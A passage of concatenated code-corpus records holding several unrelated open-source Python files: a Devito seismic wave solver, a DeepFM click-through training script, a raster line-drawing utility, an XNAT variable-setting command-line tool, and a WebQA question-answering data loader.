(Sweeping block sizes)\")\n fig.tight_layout()\n\n fig.colorbar(im, ax=ax)\n # ax = sns.heatmap(gptss_data, linewidth=0.5)\n plt.savefig(str(shape[0]) + str(np.int32(tx)) + str(np.int32(ty)) + \".pdf\")\n\n\n if 1:\n cmap = plt.cm.get_cmap(\"viridis\")\n values = u.data[0, :, :, :]\n vistagrid = pv.UniformGrid()\n vistagrid.dimensions = np.array(values.shape) + 1\n vistagrid.spacing = (1, 1, 1)\n vistagrid.origin = (0, 0, 0) # The bottom left corner of the data set\n vistagrid.cell_arrays[\"values\"] = values.flatten(order=\"F\")\n vistaslices = vistagrid.slice_orthogonal()\n vistagrid.plot(show_edges=True)\n vistaslices.plot(cmap=cmap)\n\n # import pdb;pdb.set_trace()\n return rec, u, summary\n\n def adjoint(self, rec, srca=None, v=None, vp=None, **kwargs):\n \"\"\"\n Adjoint modelling function that creates the necessary\n data objects for running an adjoint modelling operator.\n\n Parameters\n ----------\n rec : SparseTimeFunction or array-like\n The receiver data. Please note that\n these act as the source term in the adjoint run.\n srca : SparseTimeFunction or array-like\n The resulting data for the interpolated at the\n original source location.\n v: TimeFunction, optional\n The computed wavefield.\n vp : Function or float, optional\n The time-constant velocity.\n\n Returns\n -------\n Adjoint source, wavefield and performance summary.\n \"\"\"\n # Create a new adjoint source and receiver symbol\n srca = srca or self.geometry.new_src(name='srca', src_type=None)\n\n # Create the adjoint wavefield if not provided\n v = v or TimeFunction(name='v', grid=self.model.grid,\n time_order=2, space_order=self.space_order)\n\n # Pick vp from model unless explicitly provided\n vp = vp or self.model.vp\n\n # Execute operator and return wavefield and receiver data\n summary = self.op_adj().apply(srca=srca, rec=rec, v=v, vp=vp,\n dt=kwargs.pop('dt', self.dt), **kwargs)\n return srca, v, summary\n\n def jacobian_adjoint(self, rec, u, v=None, grad=None, vp=None,\n checkpointing=False, **kwargs):\n \"\"\"\n Gradient modelling function for computing the adjoint of the\n Linearized Born modelling function, ie. 
the action of the\n Jacobian adjoint on an input data.\n\n Parameters\n ----------\n rec : SparseTimeFunction\n Receiver data.\n u : TimeFunction\n Full wavefield `u` (created with save=True).\n v : TimeFunction, optional\n Stores the computed wavefield.\n grad : Function, optional\n Stores the gradient field.\n vp : Function or float, optional\n The time-constant velocity.\n\n Returns\n -------\n Gradient field and performance summary.\n \"\"\"\n dt = kwargs.pop('dt', self.dt)\n # Gradient symbol\n grad = grad or Function(name='grad', grid=self.model.grid)\n\n # Create the forward wavefield\n v = v or TimeFunction(name='v', grid=self.model.grid,\n time_order=2, space_order=self.space_order)\n\n # Pick vp from model unless explicitly provided\n vp = vp or self.model.vp\n\n if checkpointing:\n u = TimeFunction(name='u', grid=self.model.grid,\n time_order=2, space_order=self.space_order)\n cp = DevitoCheckpoint([u])\n n_checkpoints = None\n wrap_fw = CheckpointOperator(self.op_fwd(save=False), src=self.geometry.src,\n u=u, vp=vp, dt=dt)\n wrap_rev = CheckpointOperator(self.op_grad(save=False), u=u, v=v,\n vp=vp, rec=rec, dt=dt, grad=grad)\n\n # Run forward\n wrp = Revolver(cp, wrap_fw, wrap_rev, n_checkpoints, rec.data.shape[0]-2)\n wrp.apply_forward()\n summary = wrp.apply_reverse()\n else:\n summary = self.op_grad().apply(rec=rec, grad=grad, v=v, u=u, vp=vp,\n dt=dt, **kwargs)\n return grad, summary\n\n def jacobian(self, dmin, src=None, rec=None, u=None, U=None, vp=None, **kwargs):\n \"\"\"\n Linearized Born modelling function that creates the necessary\n data objects for running an adjoint modelling operator.\n\n Parameters\n ----------\n src : SparseTimeFunction or array_like, optional\n Time series data for the injected source term.\n rec : SparseTimeFunction or array_like, optional\n The interpolated receiver data.\n u : TimeFunction, optional\n The forward wavefield.\n U : TimeFunction, optional\n The linearized wavefield.\n vp : Function or float, optional\n The time-constant velocity.\n \"\"\"\n # Source term is read-only, so re-use the default\n src = src or self.geometry.src\n # Create a new receiver object to store the result\n rec = rec or self.geometry.rec\n\n # Create the forward wavefields u and U if not provided\n u = u or TimeFunction(name='u', grid=self.model.grid,\n time_order=2, space_order=self.space_order)\n U = U or TimeFunction(name='U', grid=self.model.grid,\n time_order=2, space_order=self.space_order)\n\n # Pick vp from model unless explicitly provided\n vp = vp or self.model.vp\n\n # Execute operator and return wavefield and receiver data\n summary = self.op_born().apply(dm=dmin, u=u, U=U, src=src, rec=rec,\n vp=vp, dt=kwargs.pop('dt', self.dt), **kwargs)\n return rec, u, U, summary\n\n # Backward compatibility\n born = jacobian\n gradient = jacobian_adjoint\n","sub_path":"examples/seismic/acoustic/wavesolver.py","file_name":"wavesolver.py","file_ext":"py","file_size_in_byte":20189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"244347952","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2020 Huawei Technologies Co., Ltd\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at# \n# \n# http://www.apache.org/licenses/LICENSE-2.0# \n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT 
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport os\nimport time\nimport random\nimport argparse\nimport configparser\n\nimport numpy as np\nimport pandas as pd\n\nimport torch\nif torch.__version__ >= \"1.8\":\n import torch_npu\n\nfrom sklearn.metrics import log_loss, roc_auc_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\n\nfrom deepctr_torch.inputs import SparseFeat, DenseFeat, get_feature_names\nfrom deepctr_torch.models import DeepFM\n\n\nparser = argparse.ArgumentParser(description='DeepFM for PyTorch')\nparser.add_argument('--seed', default=1234, type=int,\n help='seed for initializing training.')\n\nparser.add_argument('--use_npu', default=False, action='store_true', help='8p distributed training')\nparser.add_argument('--use_cuda', default=False, action='store_true', help='8p distributed training')\nparser.add_argument('--device_id', default=0, type=int, help='device id')\nparser.add_argument('--dist', default=False, action='store_true', help='8p distributed training')\nparser.add_argument('--device_num', default=1, type=int, help='num of npu device for training')\nparser.add_argument('--init_checkpoint', default='', type=str, help='init checkpoint for resume')\n\nparser.add_argument('--amp', default=False, action='store_true',\n help='use amp to train the model')\nparser.add_argument('--loss_scale', default=-1, type=float,\n help='loss scale using in amp, default -1 means dynamic')\nparser.add_argument('--opt_level', default='O1', type=str,\n help='apex opt level')\n\nparser.add_argument('--data_path', required=True, type=str, help='dataset repository path')\nparser.add_argument('--lr', default=0.0001, type=float, help='learning rate for training')\nparser.add_argument('--optim', default='adam', type=str, help='optimizer for model')\nparser.add_argument('--test_size', default=0.1, type=float, help='data size for testing, while the rest for training')\nparser.add_argument('--batch_size', default=1024, type=int, help='batch size for training and testing')\nparser.add_argument('--epochs', default=3, type=int, help='epochs for training')\nparser.add_argument('--steps', default=0, type=int, help='steps for training')\n\n\n# data config\nconfig = configparser.ConfigParser()\n\n\ndef fix_random(seed):\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n random.seed(seed)\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n print(args)\n\n # data config\n config.read(args.data_path + '/data.ini')\n train_sample_num = int(config.get('data', 'train_sample_num'))\n test_sample_num = int(config.get('data', 'test_sample_num'))\n\n fix_random(args.seed)\n\n sparse_features = config.get('data', 'sparse_features').split(',')\n dense_features = config.get('data', 'dense_features').split(',')\n target = config.get('data', 'target').split(',')\n\n total_trainval_sample = train_sample_num\n nrows = total_trainval_sample // args.device_num\n skip_rows = list(range(1, 1 + args.device_id * nrows)) if args.device_num > 1 else None\n\n # 1.Loading preprocessed data, where label encoded for sparse features, \n # and simple Transformation for dense features is done\n print('Loading processed data...')\n start_time = time.time()\n data_trainval = pd.read_csv(args.data_path + '/deepfm_trainval.txt', sep='\\t', 
skiprows=skip_rows, nrows=nrows)\n data_test = pd.read_csv(args.data_path + '/deepfm_test.txt', sep='\\t')\n print('Data loaded in {}s'.format(time.time() - start_time))\n\n # 2.count #unique features for each sparse field,and record dense feature field name\n sparse_nunique_list = config.get('data', 'sparse_nunique').split(',')\n sparse_nunique = [int(sparse_nunique_list[i]) for i, _ in enumerate(sparse_nunique_list)]\n fixlen_feature_columns = [SparseFeat(feat, sparse_nunique[idx], embedding_dim=8)\n for idx, feat in enumerate(sparse_features)] + [DenseFeat(feat, 1, )\n for feat in dense_features]\n print(fixlen_feature_columns)\n\n dnn_feature_columns = fixlen_feature_columns\n linear_feature_columns = fixlen_feature_columns\n\n feature_names = get_feature_names(\n linear_feature_columns + dnn_feature_columns)\n\n # 3.generate input data for model\n print('Generating input data for model...')\n start_time = time.time()\n train, test = data_trainval, data_test\n train_model_input = {name: train[name].astype(float) for name in feature_names}\n test_model_input = {name: test[name].astype(float) for name in feature_names}\n print('Input data generated in {}s'.format(time.time() - start_time))\n\n # 4.Define Model,train,predict and evaluate\n if args.dist:\n os.environ['MASTER_ADDR'] = '127.0.0.1'\n os.environ['MASTER_PORT'] = '29680'\n if args.use_npu:\n torch.distributed.init_process_group(backend='hccl', world_size=args.device_num, rank=args.device_id)\n elif args.use_cuda:\n torch.distributed.init_process_group(backend='nccl', world_size=args.device_num, rank=args.device_id)\n else:\n raise RuntimeError(\"Distributed training is not supported on this platfrom\")\n print('distributed train enabled')\n\n device = 'cpu'\n if args.use_npu:\n device = 'npu:' + str(args.device_id)\n torch.npu.set_device(device)\n elif args.use_cuda:\n device = 'cuda:' + str(args.device_id)\n torch.cuda.set_device(device)\n print('train on: ', device)\n\n model = DeepFM(linear_feature_columns=linear_feature_columns, dnn_feature_columns=dnn_feature_columns,\n task='binary', dnn_hidden_units=(512, 256), dnn_dropout=0.5,\n sparse_features_len=len(sparse_features),\n device=device, l2_reg_linear=0, l2_reg_embedding=0, dist=args.dist)\n\n model.compile(args.optim, \"binary_crossentropy\",\n metrics=[\"binary_crossentropy\", \"auc\"], lr=args.lr)\n\n history = model.fit(train_model_input, train[target].values, batch_size=args.batch_size, epochs=args.epochs,\n verbose=2, validation_split=0.1, args=args)\n pred_ans = model.predict(test_model_input, args.batch_size)\n print(\"\")\n print(\"test LogLoss\", round(log_loss(test[target].values, pred_ans), 4))\n print(\"test AUC\", round(roc_auc_score(test[target].values, pred_ans), 4))\n","sub_path":"PyTorch/built-in/others/DeepFM_for_PyTorch/run_classification_criteo_deepfm.py","file_name":"run_classification_criteo_deepfm.py","file_ext":"py","file_size_in_byte":7108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613143755","text":"import numpy as np\n\ndef RP_linedraw(i_p, j_p, i_c, j_c, for_back, extensionflag, imdim):\n\t'''\n\tSUMMARY: \n\t'RP_linedraw': draws a raster-based line from the center pixel (i,j)_c\n\tto the edge pixel (i,j)_p. 
Used primarily in the 'RP_thickness' code.\n\n\tUSING CODE:\n\tPosition 'i_p' and 'j_p', and 'i_c' and 'j_c' correspond to the pixel \n\tposition of the target pixel and center, respectively - these positions\n\tare relative to the window size created using the dimensions specified by\n\t'imdim'. 'for_back' specifies whether the line is to be extended forward\n\t('for_back' = 1) from the center pixel to the target pixel, or backwards\n\t('for_back = 0) away from the target pixel, but on the same slope.\n\t'extensionflag' specifies whether the line is to extend to the target \n\tpixel ('extensionflag' = 0) or past it to the edge of the window \n\t('extensionflag' = 1).\n\n\tPARAMETERS:\n\tA. INPUTS - \n\t1. i_p: row position for the off-center pixel (y).\n\t2. j_p: column position for the off-center pixel (x).\n\t3. i_c: row position for the center pixel (y).\n\t4. j_c: column position for the center pixel (x).\n\t5. for_back: specification for whether the drawn line will extend forwards\n\t(1) or backwards (0).\n\t6. extensionflag: specification for whether the drawn line will stop at\n\tthe off-center pixel (0) or at the edge of the window (1).\n\n\tB. OUTPUTS -\n\t1. img_out: image with dimensions 'imdim', with a line drawn under the \n\tconditions specified above.\n\n\n\tEXAMPLE:\n\tFor a 81x81 array, in which there are two pixel positions [60,30] and \n\t[55,20], we can specify 'i_p' and 'j_p' to be 60 and 30, respectively, \n\tand 'i_c' and 'j_c' to be 40 and 40, respectively. 'imdim' would correspond\n\tto [81,81]. If we set 'for_back' to 1 and 'extensionflag' to 0, a series of \n\tpixels approximating a line will be drawn between the points of [60,30] and \n\t[40,40], outputted under the variable name 'img_out'.\n\n\t'''\n\n\timg_out = np.zeros(imdim)\n\t#I. 
Determine quadrant\n\tif j_p == j_c:\t\t\t\t\t#Vertical line\n\t\tif i_p < i_c:\n\t\t\tif for_back == 1:\n\t\t\t\tquadval = 12\t\t\t#Vertical line upwards\n\t\t\telse:\n\t\t\t\tquadval = 34\n\t\telse:\n\t\t\tif for_back == 1:\n\t\t\t\tquadval = 34\t\t\t#Vertical line downwards\n\t\t\telse:\n\t\t\t\tquadval = 12\n\telse:\n\t\tif i_p == i_c:\t\t\t\t#Horizontal line\n\t\t\tif j_p < j_c:\n\t\t\t\tif for_back == 1:\n\t\t\t\t\tquadval = 13\t\t#Horizontal line left\n\t\t\t\telse:\n\t\t\t\t\tquadval = 24\n\t\t\telse:\n\t\t\t\tif for_back == 1:\n\t\t\t\t\tquadval = 24\t\t#Horizontal line right\n\t\t\t\telse:\n\t\t\t\t\tquadval = 13\n\t\telse:\n\t\t\tif i_p < i_c:\n\t\t\t\tif j_p < j_c:\n\t\t\t\t\tif for_back == 1:\n\t\t\t\t\t\tquadval = 1\t\t#Top left\n\t\t\t\t\t\tx = np.array(range(0, j_c))\n\t\t\t\t\telse:\n\t\t\t\t\t\tquadval = 4\n\t\t\t\t\t\tx = np.array(range(j_c, imdim[1]))\n\t\t\t\telse:\n\t\t\t\t\tif for_back == 1:\n\t\t\t\t\t\tquadval = 2 \t#Top right\n\t\t\t\t\t\tx = np.array(range(j_c, imdim[1]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tquadval = 3\n\t\t\t\t\t\tx = np.array(range(0, j_c))\n\t\t\telse:\n\t\t\t\tif j_p < j_c:\n\t\t\t\t\tif for_back == 1:\n\t\t\t\t\t\tquadval = 3 \t#Bottom left\n\t\t\t\t\t\tx = np.array(range(0, j_c))\n\t\t\t\t\telse:\n\t\t\t\t\t\tquadval = 2\n\t\t\t\t\t\tx = np.array(range(j_c, imdim[1]))\n\n\t\t\t\telse:\n\t\t\t\t\tif for_back == 1:\n\t\t\t\t\t\tquadval = 4 \t#Bottom right\n\t\t\t\t\t\tx = np.array(range(j_c, imdim[1]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tquadval = 1\n\t\t\t\t\t\tx = np.array(range(0, j_c))\n\t\t\t\n\t\t\txrangeval = np.shape(x)[0]\n\n\n\n\tif quadval == 12:\n\t\timg_out[0:i_c, j_c] = img_out[0:i_c, j_c] + 2\n\tif quadval == 34:\n\t\timg_out[i_c:imdim[0], j_c] = img_out[i_c:imdim[0], j_c] + 2\n\tif quadval == 13:\n\t\timg_out[i_c, 0:j_c] = img_out[i_c, 0:j_c] + 2\n\tif quadval == 24:\n\t\timg_out[i_c, j_c:imdim[1]] = img_out[i_c, j_c:imdim[1]] + 2\n\tif quadval < 10:\n\t\tfilledvals = np.zeros((xrangeval, 3))\n\t\tm = (i_p-i_c)/(j_p-j_c)\n\t\tb = i_c-m*j_c\n\t\ty = m*x+b\n\t\tfor i in range(xrangeval-1):\n\t\t\tfilledvals[i][0] = int(x[i])\n\t\t\tfilledvals[i][1] = int(np.floor(y[i]))\n\t\t\tfilledvals[i][2] = int(np.floor(y[i+1]))\n\n\t\tfilledvals[xrangeval-1][0] = int(x[xrangeval-1])\n\t\tfilledvals[xrangeval-1][1] = int(np.floor(y[xrangeval-1]))\n\n\t\tif quadval % 2 == 0:\n\t\t\tfilledvals[xrangeval-1][2] = int(np.floor(y[xrangeval-1]))\n\t\telse:\n\t\t\tfilledvals[xrangeval-1][2] = int(i_c)\n\t\t\n\t\tfilledvals[filledvals[:, 1] < 0, 1] = 0\n\t\tfilledvals[filledvals[:, 1] > imdim[1], 1] = int(imdim[1])\n\t\tfilledvals[filledvals[:, 2] < 0, 2] = 0\n\t\tfilledvals[filledvals[:, 2] > imdim[1], 2] = int(imdim[1])\n\t\trrsize = np.shape(filledvals)[0]-1\n\n\t\tif quadval == 1:\n\t\t\tremovedrows = filledvals[:, 1] + filledvals[:, 2] == 0\n\t\t\tif removedrows[0] == True:\n\n\t\t\t\t#zeropos_ = np.where(removedrows == 0)\n\t\t\t\t#zeropos = zeropos_[0][np.shape(zeropos_)[0][0]\n\t\t\t\t#zeropos = np.where(removedrows == 0)[0][0]\n\n\t\t\t\tzeropos = np.where(removedrows == True)[0][0]\n\t\t\t\tfilledvals = filledvals[zeropos:xrangeval, :]\n\t\tif quadval == 2:\n\t\t\tremovedrows = (filledvals[:, 1] + filledvals[:, 2] == 0) & (filledvals[:, 1] == 0)\n\t\t\tif removedrows[rrsize] == True:\n\t\t\t\tzeropos = np.where(removedrows == True)[0][0]\n\t\t\t\tfilledvals = filledvals[0:zeropos+1, :]\n\t\tif quadval == 3:\n\t\t\tremovedrows = (filledvals[:, 1] - filledvals[:, 2] == 0) & (filledvals[:, 2] == 0)\n\t\t\tif removedrows[rrsize] == True:\n\t\t\t\tzeropos 
= np.where(removedrows == True)[0][0]\n\t\t\t\tfilledvals = filledvals[zeropos:xrangeval, :]\n\t\tif quadval == 4:\n\t\t\tremovedrows = (filledvals[:, 1] - filledvals[:, 2] == 0) & (filledvals[:, 2] == imdim[1])\n\t\t\tif removedrows[rrsize] == True:\n\t\t\t\tzeropos = np.where(removedrows == True)[0][0]\n\t\t\t\tfilledvals = filledvals[0:zeropos+1, :]\n\n\n\t\tfor i in range(np.shape(filledvals)[0]):\n\t\t\tfilledvals[i, 1:3] = np.sort(filledvals[i, 1:3])\n\t\t\ta0 = int(filledvals[i][0])\n\t\t\ta1 = int(filledvals[i][1])\n\t\t\ta2 = int(filledvals[i][2])\n\n\t\t\timg_out[a1:a2+1, a0] = img_out[a1:a2+1, a0] + 2\n\n\tif extensionflag == 0:\n\t\tif quadval == 1:\n\t\t\timg_out[:, 0:j_p] = 0\n\t\t\timg_out[0:i_p, :] = 0\n\t\tif quadval == 2:\n\t\t\timg_out[0:i_p, :] = 0\n\t\t\timg_out[:, (j_p+1):imdim[1]] = 0\n\t\tif quadval == 3:\n\t\t\timg_out[(i_p+1):imdim[0], :] = 0\n\t\t\timg_out[:, 0:j_p] = 0\n\t\tif quadval == 4:\n\t\t\timg_out[(i_p+1):imdim[0], :] = 0\n\t\t\timg_out[:, (j_p+1):imdim[1]] = 0\n\t\n\timg_out[i_c,j_c] = 1\n\timg_out[img_out > 0] = 1\n\treturn(img_out)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"build/lib/rootprocessing/RP_linedraw.py","file_name":"RP_linedraw.py","file_ext":"py","file_size_in_byte":5983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"162276095","text":"import sys\nfrom .base import (\n connect, print_response_error, print_usage_error,\n print_info_message, base_parser, add_default_args, set_logger)\nfrom xnatutils.exceptions import XnatUtilsUsageError, XnatUtilsException\nfrom xnat.exceptions import XNATResponseError\n\n\ndef varput(subject_or_session_id, variable, value, **kwargs):\n \"\"\"\n Sets variables (custom or otherwise) of a session or subject in an XNAT instance\n project\n\n User credentials can be stored in a ~/.netrc file so that they don't need\n to be entered each time a command is run. If a new user provided or netrc\n doesn't exist the tool will ask whether to create a ~/.netrc file with the\n given credentials.\n\n Parameters\n ----------\n subject_or_session_id : str\n Name of subject or session to set the variable of\n variable : str\n Name of the variable to set\n value : str\n Value to set the variable to\n user : str\n The user to connect to the server with\n loglevel : str\n The logging level to display. In order of increasing verbosity\n ERROR, WARNING, INFO, DEBUG.\n connection : xnat.Session\n An existing XnatPy session that is to be reused instead of\n creating a new session. The session is wrapped in a dummy class\n that disables the disconnection on exit, to allow the method to\n be nested in a wider connection context (i.e. reuse the same\n connection between commands).\n server : str | int | None\n URI of the XNAT server to connect to. If not provided connect\n will look inside the ~/.netrc file to get a list of saved\n servers. 
If there is more than one, then they can be selected\n by passing an index corresponding to the order they are listed\n in the .netrc\n use_netrc : bool\n Whether to load and save user credentials from netrc file\n located at $HOME/.netrc\n \"\"\"\n with connect(**kwargs) as login:\n # Get XNAT object to set the field of\n if subject_or_session_id.count('_') == 1:\n xnat_obj = login.subjects[subject_or_session_id]\n elif subject_or_session_id.count('_') >= 2:\n xnat_obj = login.experiments[subject_or_session_id]\n else:\n raise XnatUtilsUsageError(\n \"Invalid ID '{}' for subject or sessions (must contain one \"\n \"underscore for subjects and two underscores for sessions)\"\n .format(subject_or_session_id))\n # Set value\n xnat_obj.fields[variable] = value\n\n\ndescription = \"\"\"\nSets variables (custom or otherwise) of a session or subject in an XNAT instance\nproject\n\nUser credentials can be stored in a ~/.netrc file so that they don't need to be\nentered each time a command is run. If a new user provided or netrc doesn't\nexist the tool will ask whether to create a ~/.netrc file with the given\ncredentials.\n\"\"\"\n\n\ndef parser():\n parser = base_parser(description)\n parser.add_argument('subject_or_session_id', type=str,\n help=(\"Name of subject or session to set the variable \"\n \"of\"))\n parser.add_argument('variable', type=str,\n help=\"Name of the variable to set\")\n parser.add_argument('value', help=\"Value of the variable\")\n add_default_args(parser)\n return parser\n\n\ndef cmd(argv=sys.argv[1:]):\n\n args = parser().parse_args(argv)\n\n set_logger(args.loglevel)\n\n try:\n varput(args.subject_or_session_id, args.variable, args.value,\n user=args.user, server=args.server,\n use_netrc=(not args.no_netrc))\n except XnatUtilsUsageError as e:\n print_usage_error(e)\n except XNATResponseError as e:\n print_response_error(e)\n except XnatUtilsException as e:\n print_info_message(e)\n","sub_path":"xnatutils/varput_.py","file_name":"varput_.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"194977562","text":"# -*- coding:utf-8 -*-\n# Author: Roger\n# Created by Roger on 2017/10/24\nfrom __future__ import absolute_import\nimport codecs\nimport math, random\ntry:\n import simplejson as json\nexcept:\n import json\nimport torch\nfrom torch.autograd import Variable\nfrom layers import Constants, Dictionary\n\n\ndef convert2longtensor(x):\n return torch.LongTensor(x)\n\n\ndef convert2variable(x, device=-1, volatile=True):\n if device >= 0:\n x = x.cuda(device)\n return Variable(x, volatile=volatile)\n\n\nclass Evidence(object):\n def __init__(self, e_key, e_text, e_text_index, e_feature, starts, ends):\n self.e_key = e_key # String\n self.e_text = e_text # list(string)\n self.e_text_index = e_text_index # torch.LongTensor\n self.e_feature = e_feature # torch.LongTensor\n self.starts = starts # list(int)\n self.ends = ends # list(int)\n\n def __iter__(self):\n for d in [self.e_key, self.e_text, self.e_text_index, self.e_feature, self.starts, self.ends]:\n yield d\n\n @staticmethod\n def load_one_evidence(evidence, word_dict, pos_dict, ner_dict):\n e_key = evidence['e_key']\n e_text = evidence[\"evidence_tokens\"]\n\n if 'answer_starts' in evidence:\n if len(evidence['answer_starts']) == 0:\n starts = [-1]\n else:\n starts = evidence['answer_starts']\n else:\n starts = [-1]\n if 'answer_ends' in evidence:\n if len(evidence['answer_ends']) == 0:\n ends = [-1]\n else:\n ends = 
evidence['answer_ends']\n else:\n ends = [-1]\n\n # if starts[0] == -1 or ends[0] == -1:\n # return None\n\n e_text_index = convert2longtensor(word_dict.convert_to_index(e_text, Constants.UNK_WORD))\n\n e_pos = evidence['evidence_pos']\n e_ner = evidence['evidence_ners']\n e_ner_index = convert2longtensor(ner_dict.convert_to_index(e_ner, Constants.UNK_WORD))\n e_pos_index = convert2longtensor(pos_dict.convert_to_index(e_pos, Constants.UNK_WORD))\n\n qe_feature = torch.FloatTensor(evidence[\"qecomm\"])\n ee_fre = torch.FloatTensor(evidence['fre_tokens'])\n ee_com = torch.FloatTensor(evidence['f_eecomm'])\n dis_edit = torch.FloatTensor(evidence['f_edit_dist'])\n dis_jaccard = torch.FloatTensor(evidence['f_jaccard'])\n qe_feature_c = torch.FloatTensor(evidence['qe_feature_c'])\n ee_fre_c = torch.FloatTensor(evidence['fre_token_c'])\n ee_com_c = torch.FloatTensor(evidence['f_eecomm_c'])\n dis_edit_c = torch.FloatTensor(evidence['f_edit_dist_c'])\n dis_jaccard_c = torch.FloatTensor(evidence['f_jaccard_c'])\n# ee_ratio = torch.FloatTensor(evidence['fre_ratio'])\n e_feature_index = torch.stack([e_text_index, e_pos_index, e_ner_index], dim=1)\n e_feature_float = torch.stack([qe_feature, ee_fre, ee_com, dis_edit, dis_jaccard,\n qe_feature_c, ee_fre_c, ee_com_c, dis_edit_c, dis_jaccard_c], dim=1)\n\n return Evidence(e_key, e_text, e_feature_index, e_feature_float, starts, ends)\n\n @staticmethod\n def batchify(data):\n e_key, e_real_text, e_feature_index, e_feature_float, starts, ends = zip(*data)\n e_feature_index_size = e_feature_index[0].size()[1]\n e_feature_float_size = e_feature_float[0].size()[1]\n\n e_lens = [len(e_real_text[i]) for i in range(len(data))]\n\n max_e_length = max(e_lens)\n e_index = e_feature_index[0].new(len(data), max_e_length, e_feature_index_size).fill_(Constants.PAD)\n e_feature = e_feature_float[0].new(len(data), max_e_length, e_feature_float_size).fill_(Constants.PAD)\n\n for i in range(len(data)):\n length = e_lens[i]\n e_index[i, :, :].narrow(0, 0, length).copy_(e_feature_index[i])\n e_feature[i, :, :].narrow(0, 0, length).copy_(e_feature_float[i])\n\n start_position = convert2longtensor([start[0] for start in starts])\n end_position = convert2longtensor([end[0] for end in ends])\n\n e_lens = convert2longtensor(e_lens)\n\n return e_index, e_feature, e_lens, start_position, end_position, e_key, e_real_text\n\n\nclass Question(object):\n def __init__(self, q_key, q_text, q_text_index, q_feature):\n self.q_key = q_key # String\n self.q_text = q_text # list(string)\n self.q_text_index = q_text_index # torch.LongTensor\n self.q_feature = q_feature # torch.LongTensor\n\n def __iter__(self):\n for d in [self.q_key, self.q_text, self.q_text_index, self.q_feature]:\n yield d\n\n @staticmethod\n def batchify(data):\n q_key, q_real_text, q_text_index, q_featurq_index = zip(*data)\n q_featurq_size = q_featurq_index[0].size()[1]\n\n q_lens = [q_text_index[i].size(0) for i in range(len(data))]\n max_q_length = max(q_lens)\n q_text = q_text_index[0].new(len(data), max_q_length).fill_(Constants.PAD)\n q_feature = q_featurq_index[0].new(len(data), max_q_length, q_featurq_size).fill_(Constants.PAD)\n\n for i in range(len(data)):\n length = q_text_index[i].size(0)\n q_text[i, :].narrow(0, 0, length).copy_(q_text_index[i])\n q_feature[i, :, :].narrow(0, 0, length).copy_(q_featurq_index[i])\n\n q_lens = convert2longtensor(q_lens)\n\n return q_text, q_feature, q_lens, q_key, q_real_text\n\n @staticmethod\n def load_one_question(data, word_dict, pos_dict, ner_dict):\n q_key = 
data['q_key']\n\n q_text = data[\"question_tokens\"]\n q_text_index = convert2longtensor(word_dict.convert_to_index(q_text, Constants.UNK_WORD))\n\n q_ner = data[\"question_ners\"]\n q_pos = data[\"question_pos\"]\n q_ner_index = convert2longtensor(ner_dict.convert_to_index(q_ner, Constants.UNK_WORD))\n q_pos_index = convert2longtensor(pos_dict.convert_to_index(q_pos, Constants.UNK_WORD))\n q_feature = torch.stack([q_pos_index, q_ner_index], dim=1)\n\n return Question(q_key, q_text, q_text_index, q_feature)\n\n\nclass WebQACorpus(object):\n def __init__(self, filename, batch_size=64, device=-1, volatile=False,\n word_dict=None, ner_dict=None, pos_dict=None):\n if word_dict is None:\n self.word_d, self.pos_dict, self.ner_dict = self.load_word_dictionary(filename)\n else:\n self.word_d = word_dict\n self.ner_dict = ner_dict\n self.pos_dict = pos_dict\n question_dict, evidence_dict, train_pair = self.load_data_file(filename,\n word_dict=self.word_d,\n ner_dict=self.ner_dict,\n pos_dict=self.pos_dict)\n self.question_dict = question_dict # {q_key: [question, [eid]]}\n self.evidence_dict = evidence_dict # {eid: evidence}\n self.data = train_pair # (q_key, eid, [eid_no_answer])\n self.batch_size = batch_size\n self.device = device\n self.volatile = volatile\n\n def __sizeof__(self):\n return len(self.data)\n\n def __len__(self):\n return len(self.data)\n\n def cpu(self):\n self.device = -1\n\n def cuda(self, device=0):\n self.device = device\n\n def set_device(self, device=-1):\n self.device = device\n\n def set_batch_size(self, batch_size=50):\n self.batch_size = batch_size\n\n def _question_evidence(self, question_ids, evidence_ids):\n questions = [self.question_dict[qid][0] for qid in question_ids]\n evidences = [self.evidence_dict[eid] for eid in evidence_ids]\n\n q_text, q_feature, q_lens, q_key, q_real_text = Question.batchify(questions)\n e_text, e_feature, e_lens, start_position, end_position, e_key, e_real_text = Evidence.batchify(evidences)\n\n q_text, q_feature, q_lens = [convert2variable(x, self.device, self.volatile)\n for x in [q_text, q_feature, q_lens]]\n e_text, e_feature, e_lens, start_position, end_position = [convert2variable(x, self.device, self.volatile)\n for x in [e_text, e_feature, e_lens,\n start_position, end_position]]\n\n return q_text, e_text, start_position, end_position, q_lens, e_lens, q_feature, \\\n e_feature, q_key, e_key, q_real_text, e_real_text\n\n def next_batch(self, ranking=False, shuffle=True):\n num_batch = int(math.ceil(len(self.data) / float(self.batch_size)))\n\n if not shuffle:\n data = self.data\n random_indexs = torch.range(0, num_batch - 1)\n else:\n data = [self.data[index] for index in torch.randperm(len(self.data))]\n random_indexs = torch.randperm(num_batch)\n\n for index, i in enumerate(random_indexs):\n start, end = i * self.batch_size, (i + 1) * self.batch_size\n data_tmp = data[start:end]\n batch_qid, batch_eid, batch_negs = zip(*data_tmp)\n\n if ranking:\n batch_qid = list(batch_qid) * 2\n batch_eid = list(batch_eid)\n for negs in batch_negs:\n neg = random.choice(negs)\n 